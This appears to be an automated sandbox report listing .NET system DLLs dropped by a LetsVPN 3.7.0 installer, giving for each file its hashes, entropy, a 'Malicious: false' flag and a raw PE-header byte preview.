Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r..........." ..0.............V8... ...@....... ....................................`..................................8..O....@...............$...+...`.......6..T............................................ ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................68......H.......\|!..............\4.. ...\|6......................................:.(......}......{...."..(...."..(...."..(......(......(......(......(....:.(......}......{....:.(......}......{....:.(......}......{......(....:.(......}......{....^.(...........%...}....:.(......}......{....z.(......}...........%...}....V.(......}......}......{......{....*..BSJB............v4.0.30319......l.......#~..@.......#Strings....8.......#US.<.......#GUID...L.......#Blob...

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Principal.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.900638971942071
Encrypted:	false
SSDEEP:	384:0SKiWIhW3FpwKANynsAw/98E9VF3AM+oTYIi/23:0SK8PAw/KENAMxEV23
MD5:	D2118FC496BABF725E0C6936C58A1EB6
SHA1:	A5C34F2E22BE6CD77C7C7DD6B07F1A99A98EFF0D
SHA-256:	2A3CB2F788D5A1D417C27634BDF3DBFD126F2115EC2A20C006A98BFC225E0856
SHA-512:	6743A9DCE0DE03C4195E5E257E7707C1A3444808AF7ECA80265A60C1BDCD45CF7644B1CD1FF3E83EE9555B0F9C328F2A9559313251447A344977A8C1812B1023
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ...................................@.................................t(..O....@.. ................+...`......<'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..l....................&......................................BSJB............v4.0.30319......l.......#~......@...#Strings....D.......#US.H.......#GUID...X.......#Blob......................3......................................................\.....0.....'.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.SecureString.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17384
Entropy (8bit):	6.844144052995077
Encrypted:	false
SSDEEP:	384:c0KbZWApWmWTpWrKpwKANynsAw/98E9VF3AM+oLCi4AR:zKRycAw/KENAMxOMR
MD5:	F2CC1DC1F03CC9C92BC89FE4405943E8
SHA1:	5691089B293B0B91C67F353DBB7CDCA83AB16F37
SHA-256:	909185B927ED874D68B8C6A048E28F36C72FE419507FEF313CEEC211AD9B1F8D
SHA-512:	49ABB3FA38755A927DB8404383C8FC90CB2885086BECED9FFFAD1593F976BA601F6D85626203C870DB4048CC5DCAA9D536EE3755348999377D43B042D6C1BEC6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............)... ...@....... ...................................@.................................>)..O....@...................+...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................r)......H.......p .......................(........................................(......(......(......(....BSJB............v4.0.30319......l.......#~..........#Strings....`.......#US.h.......#GUID...x...(...#Blob...........G..........3.............................................."...........C...........u...............m.b...........J.....J.....J.....J...6.J...O.J.....J.....J...j.C...S.J.............................P ............X ............` ......4.....h ....................

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Duplex.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.919704417105062
Encrypted:	false
SSDEEP:	384:mLH9W5nOW80pwKANynsAw/98E9VF3AM+oPwjijX:mL4iAw/KENAMxUCX
MD5:	1822C2DC120A282029B8FE16A00CD0EC
SHA1:	65AFE00281B63165D7AE4D86949EE288C1FDF451
SHA-256:	6A8A828A47D26DC8197F27E84865D9DC3F14B692F40B39C320C1EA258CBDA291
SHA-512:	5E0B725079A30B431CFE285BC6053660ABA31D3BF9D15F6C94C00526A567DBE37A4A2A39AA65E89DC9759078C6CCC47EF2D3713A3E02FE3BE163B310868694AB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y............" ..0..............)... ...@....... ...............................l....`..................................(..O....@..p................+...`.......'..T............................................ ............... ..H............text...$.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................X'......................................BSJB............v4.0.30319......l.......#~..D.......#Strings............#US.........#GUID.......$...#Blob......................3................................................*.0.....0...g.....P...........M...........c.......................J.....{.....~.......+...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....+.8...+.N...3.d...;.....C.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Http.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17384
Entropy (8bit):	6.825101761819289
Encrypted:	false
SSDEEP:	384:QlbWvX+WXjpwKANynsAw/98E9VF3AM+opp8IUPb84ew:Q2KAw/KENAMxUTz8+
MD5:	400A4CA7A25350BDE4F1AD1B804EC6D4
SHA1:	39B58AE25B83C4EABCC14542CC8B41045DBADDB9
SHA-256:	7A55EC7FAEB07B10419BF1C65A63C894FD61AFF9A35837F20CFD0CBAD1E98909
SHA-512:	731786C25BA7C42D78A21079E80C65DA015AC383FA8D3B4E2F6EA0AD97EEB324271D7F6AC453FBE808B454D7BD02F2751A6AF9D11CAB84B7A0C9135B2515A695
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............,... ...@....... ..............................._....`.................................L,..O....@..`................+...`......\+..T............................................ ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l...8...#~..........#Strings....T.......#US.X.......#GUID...h...$...#Blob......................3................................................}.t.....t.....a........._.......................B.................................................[.....[.....[...).[...1.[...9.[...A.[...I.[...Q.[...Y.[...a.[...i.[...q.[.......................#.....+.....+.6...+.L...3.b...;.}...C.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.NetTcp.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.836078417070679
Encrypted:	false
SSDEEP:	384:r2mtX7WWRvWW5DpwKANynsAw/98E9VF3AM+oAYRKIYyT:r28XdcAw/KENAMxA9IJ
MD5:	8679F7B31D8C81B40EC5434CF91D66FB
SHA1:	EF769C438F6424BA4BED7D9A4C853029B338CF84
SHA-256:	13CE590AD31A1F814507BD0B8D45F9C44DD3ED1A6D5AB51BF909360C42DA94CE
SHA-512:	F9FF58175D238A37BE7BB72634D14532DA7F37ABCF6B31FB9C1AB318DAB854EFC983E9E0B4042280F5341076ACD59B23977AB52DA765D6D510B2E382A98F6FF9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>c..........." ..0............."... ...@....... ..............................Lf....`..................................)..O....@..p................+...`.......(..T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.......................H.......P ......................\(......................................BSJB............v4.0.30319......l... ...#~......H...#Strings............#US.........#GUID.......$...#Blob......................3..................................................4...q.4...E.!...T...........+.....X.....'...........p.................Y.....B...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....+.8...+.N...3.d...;.....C.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Primitives.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23528
Entropy (8bit):	6.483616086646654
Encrypted:	false
SSDEEP:	384:Y8h2IgODoeNlPSCqWvVEW7VmpwKANynsAw/98E9VF3AM+oV7Ytp:lz1zNlFBbrAw/KENAMxFWp
MD5:	912A0F5B72E056B22E97798879492E5B
SHA1:	96C93DF33E19B5EA94CF6032D07B721940AB7DB2
SHA-256:	FE0895DD79FF155ADD093751000B49D9E0B9D1EFB2F5F40980A304C2E08C1601
SHA-512:	5CF795ACA36A5AFCD8F6CFF9C5C4FBCADA274FD8F4E17FD4A3E065395F8C9E1D47CB52B291B871EFECABDBD5A6C44E760BBD01871B91BDBA65AA02F2C2004C12
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........D... ...`....... ....................................`.................................xD..O....`...............0...+..........\|C..T............................................ ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc..............................@..B.................D......H.......P ..."...................B......................................BSJB............v4.0.30319......l.......#~..,...D...#Strings....p ......#US.t ......#GUID.... ..(...#Blob......................3......................................I...............\...................t.....t...C.t.....t...\.t.....t...6.t.....t.....t.....l.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+. ...+.<...+.R...3.h...;.....C.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Security.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17384
Entropy (8bit):	6.869840402481901
Encrypted:	false
SSDEEP:	384:ELkW1JgWYhpwKANynsAw/98E9VF3AM+oMAF4:EV9Aw/KENAMxZm
MD5:	9F3E971F7EC231D87D1ABAFD5F14C95C
SHA1:	05DF9D557F1A7067DA70ABFDFF862B57A4FBB960
SHA-256:	EDC5EF41A53F6C46090FA5F29A3FEA184988F0629A1CD656E01B2DD82896FC95
SHA-512:	20933187B8595F23500C6F3CFABCE2833E4A6311DA2DF72EC9E8DD51954D18836E4F10B9BD60BCD3DBE98DF61D710C521E1E6B5034904FCAC849CBDD8062F155
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....1..........." ..0.............V-... ...@....... ..............................W/....`..................................-..O....@...................+...`.......,..T............................................ ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................8-......H.......P ..<....................+......................................BSJB............v4.0.30319......l...<...#~......X...#Strings............#US.........#GUID.......(...#Blob......................3................................................:.............................w...........s.......................Z.............%.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....+.:...+.P...3.f...;.....C.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Syndication.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	19432
Entropy (8bit):	6.775879088015671
Encrypted:	false
SSDEEP:	384:yISW5NW2eWklpwKANynsAw/98E9VF3AM+oZ9/Q:y+5b7Aw/KENAMxY
MD5:	B163FD43E6AF71F24EB6D574FCC1D2FB
SHA1:	863359CD40FCD452DFBC5B0D217210B5576D1645
SHA-256:	308EC9BEAF35014DD2736AD71BB43E1280AA95393B8D37BE2938B6C020965B0A
SHA-512:	8A3EEE8EE2CEB4F3A753F84512A9ACC4D1EADAFE53D4D7386865D86D03107BB9320538EF59C33E3D2C4A4ABD19B98546FF98D2405A46FDB728C8860F0025256D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............4... ...@....... ....................................`................................./4..O....@............... ...+...`......83..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................c4......H........ ...............0.. ....2......................................:.(......}......{...."..(...."..(...."..(...."..(...."..(....*BSJB............v4.0.30319......l.......#~..........#Strings....\.......#US.`.......#GUID...p.......#Blob...........W..........3........................................................".........................q.......................B...................q...........q...X.q...'.q.....q...K.q...h.q.....q.....q...............%.....y.......{.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceProcess.ServiceController.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	21480
Entropy (8bit):	6.75285979389933
Encrypted:	false
SSDEEP:	384:WEO4YkTdk8VKWCWV1upaWpHpwKANynsAw/98E9VF3AM+o5M87rd8o:WEOSQSAw/KENAMx7tL
MD5:	41D41E8800C6F4E6A8CD119E2EDB84AC
SHA1:	7EAFA308A8B2A4B7A2ACA135A5F10CA7F2F9EA61
SHA-256:	ABE5CEBB8D9486D118CA4A3F92A198228682206143674CD684357B1515EF97E3
SHA-512:	6E7B84F6A8EE890B3B91358FA8065F90414947F7532B28849E8957E1B76C56773067623B4392325E7ABE72A7CDD16DBC8F51FF2589B32CF7BECF11AD80839242
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............" ..0.............;... ...@....... ..............................f.....`..................................:..O....@...............(...+...`.......9..T............................................ ............... ..H............text...0.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................;......H........!...............7..0...H9......................................:.(......}......{...."..(...."..(...."..(...."..(...."..(......(......(......(......(....:.(......}......{....:.(......}......{....:.(......}......{......(....:.(......}......{....^.(...........%...}....:.(......}......{....z.(......}...........%...}....V.(......}......}......{......{....BSJB............v4.0.30319......l...4...#~......T...#Strings............#US.........#GUID...

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Text.Encoding.CodePages.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	763880
Entropy (8bit):	7.476776657561635
Encrypted:	false
SSDEEP:	12288:TILs7xn7kZQ6kliVreJIHHr0tRYbKr2KtG9VKABC6rPqAN:EG9km6k/IwRYbiBeKGCzAN
MD5:	AA0EDECEC98FC03EBFC4CFE2F104C2D8
SHA1:	37DF762A94D4715FAEEBD13080E28C643FA2AC1C
SHA-256:	385DFDB38FD3974D978FF4DEB8615E924BF13B82DBEF5E28007FF06A9100AFCD
SHA-512:	014A15EC64C7BC34870F0F01FF91E4A2260B339EE465C1FEF3729452D3F0691B8485D8674B06C4DAC51A69A7CCDB3C8515B6755E39B37AD1BDC15A978A76BA50
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....mo..........." ..0..p..........n^... ........... ..............................+.....`..................................^..O....................\|...+...........]..T............................................ ............... ..H............text....o... ...p.................. ..`.rsrc................r..............@..@.reloc...............z..............@..B................M^......H.......H....$..........<...`....\........................................(....^.(.......5...%...}....:.(......}....:.(......}....:.(......}.....~.....0..........(....,....(.....o.......&.................!....0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....( .....(!.....(....,.r...p......%...%...(.......("...*.(...

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Text.Encoding.Extensions.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.927179205354201
Encrypted:	false
SSDEEP:	384:lb1nWCXWmdpwKANynsAw/98E9VF3AM+orDVZ0Q:x74Aw/KENAMxXH
MD5:	90A4D4A07BEB68CF3F641935FF0229C1
SHA1:	BC2A0BAEB1EC6C34714C40F33D8194AA540AAAD4
SHA-256:	CDC8957F0778ED38E697BA3B7661F9D3543DA00FDBA834A61AF62F4978F98294
SHA-512:	F9B62F7177CA2020EB44EDC7A1F097096392189504AF98E24318289EAE51BCE0A70DB1E2237290FB6A0B6B70B699963A16F46064FD2DDAF8B764480CE33217A5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................]r....@..................................(..O....@..T................+...`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~.. ...t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....6.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Text.Encoding.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.836516443249949
Encrypted:	false
SSDEEP:	384:IqyW7TWLopwKANynsAw/98E9VF3AM+oR2b7NT:1f0Aw/KENAMxwT
MD5:	73E9DCD5DD395B8C15EAB23303AE9AE3
SHA1:	54697AA3D6A002F982BA6F93C3AF85AA6C1133BA
SHA-256:	5020407879BABD2AF25F093BD45665C03FC5831CAD9D58D2DBCE87D12F59BBDD
SHA-512:	3546F0AA0DB8094490EEA23CBFCD33BFE7F69700BCF27CE871B5B08329898BB2031FAD9C4CD39AD9A2348A3901964EC33F6655083BD19A2859CC9E654E5A6693
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............2... ...@....... ...............................e....@..................................)..O....@...................+...`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.......................H.......P ......................((......................................BSJB............v4.0.30319......l...0...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.7.....7.....7...C.7.....7.....7...[.7...x.7...-.0.....7.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Text.RegularExpressions.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.960673757391943
Encrypted:	false
SSDEEP:	384:l6Rb32WVzWVUpwKANynsAw/98E9VF3AM+ogBBuQi3:8Rb3duAw/KENAMxgXu7
MD5:	8D876A48CE52BCA7873C6C29B10BB96E
SHA1:	B22DF4366A0325156A792032FC95E947E6C22D43
SHA-256:	F7C91AE5F6A7A8258EDA85589FB77A46E454305320409512DC336DAA60DC1083
SHA-512:	31A7339EA54420DD0C260C333A8C5DD569C889501A22AA6C5C4C52441F3AD2BC966CC917D3AA1037AE30C5BC7DCFAB38BC2796F93711BF668F30B03C4669CCFD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................X.....@.................................t)..O....@..P................+...`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................K...d.K...8.8...k.....L.................K.................c...........5.........................2.....2.....2...).2...1.2...9.2...A.2...I.2...Q.2...Y.2...a.2...i.2...q.2.......................#.....+.....3.....;. ...C.;...K.[...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.AccessControl.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32232
Entropy (8bit):	6.374023696115185
Encrypted:	false
SSDEEP:	384:LMTiavAbgFWyO5XIu+TJSl2Yd5zcNEkUr6ODA7WpOWKupwKANynsAw/98E9VF3AJ:LMWavA+YHfsZtauAw/KENAMxK
MD5:	D393460D0440E84FC59A295DEE479D66
SHA1:	1204D4151A146572AD7F4978AC051C60F46131B7
SHA-256:	3D8792448435361C357C8851973535DD446DCBE3DA702D039FF662A27BD50A9C
SHA-512:	72C9B9D1E0687793EE022CCEF9590D0BBEDFA06F9E025B10D090A469A994BB27CDB2BA6E6D9DB107E0C7846FFDAC40A475D0C0EBA9696BBFFBB3C4ED078E3CEE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..D..........zb... ........... ..............................."....`.................................%b..O.......l............R...+..........(a..T............................................ ............... ..H............text....B... ...D.................. ..`.rsrc...l............F..............@..@.reloc...............P..............@..B................Yb......H........%..$-...........R.......`........................................(....^.(..........%...}....:.(......}....:.(......}....:.(......}.....~.....0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......( ....(...

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Overlapped.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32744
Entropy (8bit):	6.586709819373184
Encrypted:	false
SSDEEP:	768:cu5I+sqOylryry8qqIfUc7a5xAw/KENAMxY8:cYIVBpry8qqIfUcm5xAwrxp
MD5:	E2F5E7ED8C7E04FB7A2C32A4170260E5
SHA1:	CBB76FA4201F2BF9C5FA53600A0BC29F218855A4
SHA-256:	203CFB596421D608F65F145F93427CA68E2D8A75BAB0D6D94EA8F32FFE22D63E
SHA-512:	B2DBDEFE0EA0F8325736ECB684DE537B6D57D4DB7BD44F5CDA58EBAF0060E874495A9E5C3F6C38FD73E42028CB30834E8A19E6F922CDD90B4BD4B983C52EA697
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..F...........d... ........... ....................................@..................................c..O.......x............T...+...........c............................................... ............... ..H............text....D... ...F.................. ..`.rsrc...x............H..............@..@.reloc...............R..............@..B.................c......H........&...7...........^.......b......................................j~....%-.&(....s....%..........0..$.........(.....o.......&...,....o....,.....................,!(....,..r...p.(....(......(......(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(....2r...p.(....2rK..p.(....2ry..p.(....2r...p.(....2r...p.(....2rc..p.(..........(......0..;........\|....(......./......(....o....s

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Tasks.Extensions.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	28136
Entropy (8bit):	6.5543265047258
Encrypted:	false
SSDEEP:	384:jvR973o62/KqcAnb05J3w0I5eUGef8s72XBWdvVW2JW8ah1pwKANynsAw/98E9Vh:jvRZ4nNxnYTb6BlhpAw/KENAMxp7L
MD5:	45AE1D721891F77D2E6A6BC3E6EAB195
SHA1:	1AB3C6CAFF6F2D959C3D4597CB02E126E56DB58A
SHA-256:	22F85D65BD689C5393FF32E5E7CBB3D87531F3FA7BA8A3DAAAB44BA08F613E87
SHA-512:	0FEF3C23F833C69A74199ADE21392C6712EC0881FB27592DF3125EC06722331178FDA6F0707D0AA8355693ADC565B92AE6F92D48DE10A63B0F61DE0ADFAE7E45
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..8...........V... ...`....... ...................................@..................................V..O....`...............B...+..........PU............................................... ............... ..H............text....6... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................V......H........0...$...................T........................................(......(....z..(....z2.(....s....2.(....s....:........o.....~....~.-..(......}......}......}....~.-..(......}......}......}....Z..}......}......}....J.{....%-.&.o....^.u....,........(.....~.{.....{....3..{.....{.......&...(....2...(...........0..'........{......,..u....%-.&..(...+(....(....n.{....,..(....s.....q....*..0..a.........{....o0.....,;..{....o2...(......;...3.~.......s......

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Tasks.Parallel.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.928323919167167
Encrypted:	false
SSDEEP:	384:z4vn4HREpWiQW87pwKANynsAw/98E9VF3AM+oI3J:zPSfAw/KENAMx4
MD5:	A73C080C9562DEBA6E6F8B2626F24A00
SHA1:	2A5048D16C100B1E3422D5B8DEB13FBEBACEE7DB
SHA-256:	2D2357B931E68EB9283ED8817EDB64C8D3B5A2C6723BD32E2D3371916E76FB90
SHA-512:	BE2767E98759423A59D873796E2545848197990BC49E396B525B33F2BE8E49152CAC8FB095F45FFE229CE905996F44D2FAB45A4AE39EE576996F8B74D2C50405
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@..P................+...`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......l...#Strings....\|.......#US.........#GUID...........#Blob......................3......................................................n.....B.....".....V.................U...........$.....m...........?.....(...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Tasks.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17384
Entropy (8bit):	6.829158312131995
Encrypted:	false
SSDEEP:	384:k8MjKb47T3UCcqFMkJ59WdtWpXpwKANynsAw/98E9VF3AM+oD5KAo/:VMjKb4vcGdOLAw/KENAMxMAo/
MD5:	98579FA7FB01CD7666F564FD273AD424
SHA1:	88792C42E1B526E2D907ECE65BC64D2A07C99D49
SHA-256:	4FFC812D280F101C200872A7140DCA5FB222A08F506997AE9FFF27CB27D8C199
SHA-512:	F7331EBA38A6CC2F9B1442178B7CDA78F32507730730AAA3ED6C3B8D764EE20AEEA2290CE0CD55D3A743C80A0B220DAADE03C06197FC388F5D45118E14C305B4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ...............................5....@.................................`,..O....@...................+...`......(+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P ..X....................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....4.......#US.8.......#GUID...H.......#Blob......................3................................!.....O.......................................].....z.............................7.......j...........n...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Thread.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.917328117494581
Encrypted:	false
SSDEEP:	384:jzyNXd4+BW6FWzrpwKANynsAw/98E9VF3AM+o0PkUpw8Pa3:qzxAw/KENAMxqZ6
MD5:	C9F015CBA9609668C0C970A1A88CB4E8
SHA1:	9ECF07C05EE73AD21372CAD179CDECFB1C4E7A03
SHA-256:	D1B57D24DBE51F1EC4B9B9A5CBA555550B274D94575BCC75E964E02CCE3875DF
SHA-512:	41CC6DDF48BF19F6643B202B42A3BD0EEE9D3848C42556ABED47411488FF5CE688852751B5B2BA8479AC8E9A5AF987A63F9252AEEA00193C44DE7AD0994BB2B8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@...................+...`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...p...#Strings............#US.........#GUID...........#Blob......................3..................................................'.....'...T.....G.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.ThreadPool.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.916441350283002
Encrypted:	false
SSDEEP:	384:/vs2Q3HKJNrWWRWiSpwKANynsAw/98E9VF3AM+ogHr90:/uMlAw/KENAMxMS
MD5:	0597C0D32D6E663B59B92D42D98FE31B
SHA1:	6F7392F213D5C9C4E3EE94DCD4C25333F7527F8D
SHA-256:	FBF32DFA2811A9F728FC51B437F763CEBACEFD1E6E931ED18068643A9E7C9C45
SHA-512:	F3E295022257DD1C95D8A9B7D045B844C0A0AFA1943FB008B80E6C792700587135C129DDB3DE08E54493A261F91F96AABA6FBF9EADF98D1F77D40342183DCB12
Malicious:	false
